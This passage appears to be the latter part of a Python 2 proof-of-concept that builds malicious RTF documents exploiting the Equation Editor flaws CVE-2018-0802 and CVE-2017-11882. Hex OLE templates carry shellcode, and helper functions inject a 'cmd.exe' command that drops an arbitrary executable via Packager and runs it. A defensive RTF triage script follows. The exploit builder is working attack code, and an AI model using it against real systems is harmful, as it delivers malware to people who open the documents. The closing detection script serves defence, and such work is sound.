EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 20202020202020202020202020202020202020202020202020202020202020202020202020202020 202020202020202020202020202020202020202020202020202020202020202026908B44242C662D 51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550 494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000 00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800 0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000 0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000 1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00 FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020 20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000 00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400 00002D01010004000000F0010000030000000000 """ OBJDATA_TEMPLATE_11882 = R""" 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000004500710075 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000ff ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500 
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""


# Python 2 script: str.encode("hex"), str.translate(None, ...) and the print
# statement at the bottom are Python 2 only.
def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
    if len(command) > max_len:
        raise ValueError("primitive command must not exceed %d bytes" % max_len)
    hex_command = command.ljust(max_len).encode("hex")
    # The templates are hex text with line breaks; drop the breaks before slicing.
    objdata_hex_stream = objdata_template.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER


def create_rtf(header, trailer, executable, double):
    # CVE-2018-0802 exploit
    ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
    p = Package(executable)
    package = p.build_package()
    outbuf = header + package + ole1
    if double:
        # CVE-2017-11882 exploit
        outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
    return outbuf + trailer


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
    parser.add_argument("-e", "--executable", help="File to embed and exec", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
    args = parser.parse_args()
    with open(args.output, 'w') as f:
        f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
    print "[+] Completed!"
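Both OLE templates above carry the same three markers a defender can key on: the Equation.3 class name in the OLE1 header, the Equation Editor CLSID {0002CE02-0000-0000-C000-000000000046} and the UTF-16 stream name "Equation Native". The following triage script is an added example and is not part of the PoC or its author's code: it walks the \objdata groups of an RTF file, decodes the OLE1 stream each one carries (per the MS-OLEDS layout) and flags objects that show any of those markers. The function names and the two sample documents are constructed here; the script only reports the presence of Equation Editor objects, it does not judge exploitability.

```python
# Added example (defender-side triage), not part of the PoC above: walk the
# \objdata groups of an RTF file, decode the OLE1 stream each carries, and
# report whether it names the Equation Editor class (Equation.3) or contains
# the Equation Editor CLSID or its "Equation Native" stream name.
# The sample RTF documents at the bottom are constructed for illustration.
import re
import struct

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} as the
# little-endian byte sequence it has inside an OLE stream.
EQUATION_CLSID = bytes.fromhex("02CE020000000000C000000000000046")
# UTF-16LE name of the stream that holds MTEF data in Equation.3 objects.
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")
# Compound File Binary (OLE2) header signature.
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
# RTF control word (\foo-12 ) or control symbol (\*); skipped when reading hex.
CONTROL = re.compile(r"\\[a-zA-Z]+-?\d* ?|\\.")
HEX_DIGITS = set("0123456789abcdefABCDEF")


def extract_objdata_hex(rtf_text):
    """Return the hex payload of every \\objdata group, ignoring nested groups."""
    payloads = []
    for m in re.finditer(r"\\objdata\b", rtf_text):
        i, depth, buf = m.end(), 0, []
        while i < len(rtf_text):
            cw = CONTROL.match(rtf_text, i)
            if cw:  # control word letters are not hex data
                i = cw.end()
                continue
            c = rtf_text[i]
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break  # closing brace of the \objdata group
                depth -= 1
            elif depth == 0 and c in HEX_DIGITS:
                buf.append(c)
            i += 1
        payloads.append("".join(buf))
    return payloads


def parse_ole1(data):
    """Parse an OLE1 (OLESTREAM) header: OLEVersion, FormatID, ClassName and,
    for FormatID 2 (embedded), TopicName, ItemName, NativeDataSize, NativeData."""
    if len(data) < 12:
        return None
    version, format_id, name_len = struct.unpack_from("<III", data, 0)
    off = 12
    if off + name_len > len(data):
        return None
    class_name = data[off:off + name_len].rstrip(b"\x00").decode("latin-1")
    off += name_len
    native = b""
    if format_id == 2:
        for _ in range(2):  # TopicName and ItemName, each length-prefixed
            if off + 4 > len(data):
                return None
            (slen,) = struct.unpack_from("<I", data, off)
            off += 4 + slen
        if off + 4 <= len(data):
            (size,) = struct.unpack_from("<I", data, off)
            native = data[off + 4:off + 4 + size]
    return {"version": version, "format_id": format_id,
            "class_name": class_name, "native": native}


def scan_rtf(rtf_text):
    """One finding per embedded object; 'suspicious' marks Equation Editor use."""
    findings = []
    for hexstr in extract_objdata_hex(rtf_text):
        data = bytes.fromhex(hexstr[:len(hexstr) & ~1])  # drop a dangling nibble
        ole = parse_ole1(data)
        class_name = ole["class_name"] if ole else None
        finding = {
            "class_name": class_name,
            "has_cfb": CFB_MAGIC in data,
            "equation_clsid": EQUATION_CLSID in data,
            "equation_native_stream": EQUATION_NATIVE in data,
        }
        finding["suspicious"] = bool(
            (class_name or "").lower().startswith("equation")
            or finding["equation_clsid"] or finding["equation_native_stream"])
        findings.append(finding)
    return findings


def build_ole1(class_name, native):
    """Assemble a minimal OLE1 embedded-object stream (constructed test fixture)."""
    name = class_name.encode("ascii") + b"\x00"
    return (struct.pack("<III", 0x501, 2, len(name)) + name
            + struct.pack("<III", 0, 0, len(native)) + native)


def wrap_rtf(ole1_bytes):
    """Embed an OLE1 stream in a minimal RTF document (constructed test fixture)."""
    return "{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata " + ole1_bytes.hex() + "}}}"


# Constructed samples: an Equation.3 object and a harmless Package object.
SAMPLE_EQUATION = wrap_rtf(build_ole1(
    "Equation.3", CFB_MAGIC + b"\x00" * 8 + EQUATION_NATIVE + b"\x00" * 4))
SAMPLE_BENIGN = wrap_rtf(build_ole1("Package", b"constructed benign payload"))
```

Run `scan_rtf()` over the text of a document under review; a finding with `suspicious` set, or any object whose class name is not one your environment expects (Package objects used for file drops are worth a second look too), is a reason to detonate the file in a sandbox rather than open it. The parser reads only the OLE1 header and slices the native data, so a truncated or oversized length field cannot make it read past the decoded buffer.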